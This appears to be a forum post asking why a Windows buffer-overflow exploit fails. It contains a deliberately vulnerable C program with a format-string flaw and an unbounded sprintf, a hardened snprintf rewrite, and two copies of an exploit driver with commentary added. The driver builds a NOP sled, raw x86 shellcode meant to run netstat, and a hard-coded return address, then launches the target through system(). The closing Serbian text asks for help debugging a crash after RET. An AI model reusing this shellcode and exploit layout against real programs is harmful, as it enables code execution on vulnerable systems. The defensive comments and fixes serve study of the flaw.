Code:
#include <stdio.h>
#include <string.h>
/*
 * Deliberately vulnerable sample, kept exactly as posted (presumably the
 * source of the "vuln.exe" that the exploit listing on this page launches).
 * It formats the first command-line argument into a 100-byte local array.
 */
int main(int argc, char *argv[])
{
/* Fixed-size automatic array; nothing below limits how much is written to it. */
char buffer[100];
/*
 * Three defects on this one line:
 *  1. argv[1] is passed as the FORMAT string, so any '%' conversion typed
 *     on the command line is interpreted by sprintf (CWE-134).
 *  2. sprintf has no size argument: output longer than 99 characters runs
 *     past the end of buffer (CWE-121).
 *  3. argc is never checked; when no argument is given argv[1] is a null
 *     pointer.
 * Safe form: check argc >= 2, then
 *     snprintf(buffer, sizeof buffer, "%s", argv[1]);
 * and treat a return value >= sizeof buffer as truncation.
 */
sprintf(buffer,argv[1]);
return (0);
}
#include <stdio.h>
#include <string.h>
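/*
 * Copy the first command-line argument into a fixed-size buffer.
 *
 * Hardened version of the listing as posted. The posted code called
 * sprintf(buffer, argv[1]), which
 *   - used command-line text as the format string (CWE-134),
 *   - placed no bound on the write into the 100-byte buffer (CWE-121),
 *   - dereferenced argv[1] without checking argc.
 *
 * Returns 0 on success, 1 when the argument is missing or does not fit.
 */
int main(int argc, char *argv[])
{
    char buffer[100];
    int written;

    /* argv[1] exists only when at least one argument was supplied. */
    if (argc < 2) {
        fputs("usage: vuln <text>\n", stderr);
        return (1);
    }

    /*
     * Constant "%s" format: the argument is treated as data only.
     * snprintf never writes more than sizeof buffer bytes and always
     * NUL-terminates.
     */
    written = snprintf(buffer, sizeof buffer, "%s", argv[1]);
    if (written < 0 || (size_t)written >= sizeof buffer) {
        /* Reject over-long input explicitly instead of truncating silently. */
        fputs("argument too long\n", stderr);
        return (1);
    }

    return (0);
}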
Exploit.c
Code:
#include <stdio.h>
#include <string.h>
main()
{
char filename[] = "vuln.exe ";
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xF8\x4E"
"\xC6\x45\xF9\x45"
"\xC6\x45\xFA\x54"
"\xC6\x45\xFB\x53"
"\xC6\x45\xFC\x54"
"\xC6\x45\xFD\x41"
"\xC6\x45\xFE\x54"
"\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes
char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes
char ret[] = "\xA4\xFE\x12\x00";
static char buffer[1000];
strcat(buffer,filename);
strcat(buffer,nops);
strcat(buffer, shellcode);
strcat(buffer,"IvanBBBB");
strcat(buffer,ret);
system(buffer);
}
#include <stdio.h>
#include <string.h>
/*
 * Second copy of the proof-of-concept driver, kept byte-for-byte as posted.
 * It concatenates "vuln.exe ", 45 bytes of 0x90, a 51-byte machine-code
 * blob, the filler "IvanBBBB" and a hard-coded 4-byte value into one
 * command line and runs it with system(). The argument is longer than the
 * 100-byte buffer in the target listing on this page.
 *
 * For defenders: the defect to fix is the target's sprintf(buffer, argv[1]),
 * which needs a constant format string, a bounded write and an argc check.
 * Compiler stack protection, DEP/NX and ASLR are the platform-level
 * mitigations for this class of overflow.
 */
main()
{
/* Target executable name followed by a space separator. */
char filename[] = "vuln.exe ";
/*
 * Raw x86 bytes, treated as opaque here. The bytes 4E 45 54 53 54 41 54
 * spell "NETSTAT" in ASCII, matching the post's stated intent.
 */
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xF8\x4E"
"\xC6\x45\xF9\x45"
"\xC6\x45\xFA\x54"
"\xC6\x45\xFB\x53"
"\xC6\x45\xFC\x54"
"\xC6\x45\xFD\x41"
"\xC6\x45\xFE\x54"
"\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes
/* 45 bytes of 0x90 (x86 NOP) used as leading padding. */
char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes
/*
 * Hard-coded value ending in 0x00; strcat stops at that byte, so only
 * three bytes are appended. NOTE(review): looks like a little-endian
 * address from the author's own machine; confirm.
 */
char ret[] = "\xA4\xFE\x12\x00";
/* Zero-initialised because it is static, so strcat can append immediately. */
static char buffer[1000];
strcat(buffer,filename);
strcat(buffer,nops);
strcat(buffer, shellcode);
strcat(buffer,"IvanBBBB");
strcat(buffer,ret);
/* Executes the assembled string as a shell command. */
system(buffer);
}
I zasto ovo ne radi? Kada hocu, npr., da pokrenem cmd, ono radi! Probao sam da pokrenem Notepad i nece; u ovom primeru pokusavam da pokrenem netstat i nece!
Kaze da nesto nije u redu sa ESP, tj. program mi se srusi odmah nakon RET!
tnx